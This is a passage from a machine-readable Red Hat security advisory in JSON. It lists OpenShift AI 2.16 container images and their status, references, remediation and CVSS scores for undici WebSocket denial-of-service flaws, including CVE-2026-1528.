"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "undici: undici: Denial of Service via unbounded memory consumption during WebSocket permessage-deflate decompression"
},
{
"cve": "CVE-2026-1528",
"cwe": {
"id": "CWE-248",
"name": "Uncaught Exception"
},
"discovery_date": "2026-03-12T21:01:36.954017+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2447145"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in undici. A remote attacker could exploit this vulnerability by sending a specially crafted WebSocket frame with an extremely large 64-bit length. This causes undici\u0027s ByteParser to overflow its internal calculations, leading to an invalid state and a fatal TypeError. The primary consequence is a Denial of Service (DoS), which terminates the process.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "undici: undici: Denial of Service via crafted WebSocket frame with large length",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1528"
},
{
"category": "external",
"summary": "RHBZ#2447145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447145"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1528",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1528"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj",
"url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj"
},
{
"category": "external",
"summary": "https://hackerone.com/reports/3537648",
"url": "https://hackerone.com/reports/3537648"
}
],
"release_date": "2026-03-12T20:21:57.775000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
